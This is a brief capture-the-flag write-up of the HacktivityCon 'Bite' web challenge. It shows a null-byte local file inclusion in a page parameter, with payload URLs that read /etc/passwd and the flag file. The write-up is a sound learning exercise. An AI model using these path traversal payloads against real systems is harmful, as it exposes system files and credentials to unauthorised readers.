Bite - Null Byte LFI - HacktivityCon

![cff1cf2aaafcfb1bea3131a056c69af3.png](d1f7ae0bf7e94fdd82a5652f2ce2ca54.png) ![965a2adeef9fc99509641b509594901a.png](bd603931bd0f490984b0691d02a53128.png) When clicking on one of the reference links, the url changes: `jh2i.com:50010/?page=bit` Looks to be pulling the page from the server. Check for LFI ![c38eb46ac57d3c70e230b33f34146106.png](8332413af78d474e9e7ccd0049f80254.png) No dice there. Let's append a null byte and see what happens `http://jh2i.com:50010/?page=../../../etc/passwd%00` ![80244cd1cc3846c9c40e3b57a1309690.png](816dfc2f19f44b65ba846bb87899fd6c.png) There we go `http://jh2i.com:50010/?page=../../../flag.txt%00` ![01d89e829d5fad1e2c6b71285ad875d7.png](fcb9249228124c118ee1cc57aecea4b8.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #file_inclusion #lfi #php #nullbyte #web Related: